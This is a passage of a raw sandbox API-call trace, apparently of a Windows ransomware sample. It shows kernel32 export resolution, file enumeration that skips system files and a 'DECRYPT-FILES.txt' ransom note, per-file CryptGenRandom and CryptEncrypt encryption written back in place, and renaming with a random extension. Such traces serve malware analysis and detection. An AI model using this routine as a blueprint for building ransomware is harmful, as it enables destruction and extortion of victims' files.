lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.602] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.602] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.602] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.602] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.602] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.602] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.602] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.602] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.602] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.602] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.602] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.602] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.602] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.602] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.602] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.603] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.603] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.603] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.603] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.603] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.603] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.603] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.603] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.603] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.603] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.603] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.603] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.603] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.603] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.603] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.603] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.603] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.603] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.603] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.604] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.604] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.604] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.604] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.604] lstrlenA (lpString="DELETEATOM") returned 10 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.604] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.604] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.604] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.604] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.604] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.604] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.604] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.604] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.604] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.604] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.604] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.604] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.604] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.604] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.605] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.605] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.605] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.605] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.605] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.605] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.605] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.605] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.605] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.605] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.605] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.605] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.605] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.605] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.605] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.605] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.605] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.606] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.606] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.606] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.606] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.606] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.606] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.606] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.606] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.606] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.606] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.606] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.606] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XG1ODMqHamQ.gif") returned 61 [0082.606] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XG1ODMqHamQ.gif.APnd25D") returned 69 [0082.606] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XG1ODMqHamQ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xg1odmqhamq.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XG1ODMqHamQ.gif.APnd25D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xg1odmqhamq.gif.apnd25d"), dwFlags=0x0) returned 1 [0082.607] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.607] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.608] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.608] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9e5d0c70, ftCreationTime.dwHighDateTime=0x1d4d3b0, ftLastAccessTime.dwLowDateTime=0x2295a730, ftLastAccessTime.dwHighDateTime=0x1d4c76e, ftLastWriteTime.dwLowDateTime=0x2295a730, ftLastWriteTime.dwHighDateTime=0x1d4c76e, nFileSizeHigh=0x0, nFileSizeLow=0x12399, dwReserved0=0x0, dwReserved1=0x0, cFileName="xw7Ljtxw.gif", cAlternateFileName="")) returned 1 [0082.608] lstrcmpiW (lpString1="xw7Ljtxw.gif", lpString2="DECRYPT-FILES.txt") returned 1 [0082.608] lstrcmpiW (lpString1="xw7Ljtxw.gif", lpString2="autorun.inf") returned 1 [0082.608] lstrcmpiW (lpString1="xw7Ljtxw.gif", lpString2="boot.ini") returned 1 [0082.608] lstrcmpiW (lpString1="xw7Ljtxw.gif", lpString2="desktop.ini") returned 1 [0082.608] lstrcmpiW (lpString1="xw7Ljtxw.gif", lpString2="ntuser.dat") returned 1 [0082.608] lstrcmpiW (lpString1="xw7Ljtxw.gif", lpString2="iconcache.db") returned 1 [0082.608] lstrcmpiW (lpString1="xw7Ljtxw.gif", lpString2="bootsect.bak") returned 1 [0082.608] lstrcmpiW (lpString1="xw7Ljtxw.gif", lpString2="ntuser.dat.log") returned 1 [0082.608] lstrcmpiW (lpString1="xw7Ljtxw.gif", lpString2="thumbs.db") returned 1 [0082.608] lstrcmpiW (lpString1="xw7Ljtxw.gif", lpString2="Bootfont.bin") returned 1 [0082.608] lstrlenW (lpString="xw7Ljtxw.gif") returned 12 [0082.608] lstrcmpiW (lpString1="gif", lpString2="lnk") returned -1 [0082.608] lstrcmpiW (lpString1="gif", lpString2="exe") returned 1 [0082.608] lstrcmpiW (lpString1="gif", lpString2="sys") returned -1 [0082.608] lstrcmpiW (lpString1="gif", lpString2="dll") returned 1 [0082.608] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.608] lstrlenW (lpString="xw7Ljtxw.gif") returned 12 [0082.608] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.608] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="xw7Ljtxw.gif" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xw7Ljtxw.gif") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xw7Ljtxw.gif" [0082.608] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.609] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xw7Ljtxw.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xw7ljtxw.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.609] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=74649) returned 1 [0082.609] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.609] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0082.609] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.609] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.609] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.609] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.610] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0082.611] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.611] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0082.612] CloseHandle (hObject=0x444) returned 1 [0082.612] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.612] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.613] CloseHandle (hObject=0x0) returned 0 [0082.613] CloseHandle (hObject=0x440) returned 1 [0082.613] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.613] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.613] GetTickCount () returned 0x114d1ff [0082.613] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.614] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.614] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.614] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.615] lstrlenA (lpString="kernel32.dll") returned 12 [0082.615] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.615] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.615] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.615] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.615] lstrlenA (lpString="ADDATOMA") returned 8 [0082.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.615] lstrlenA (lpString="ADDATOMW") returned 8 [0082.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.615] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.615] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.615] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.615] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.615] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.615] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.615] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") 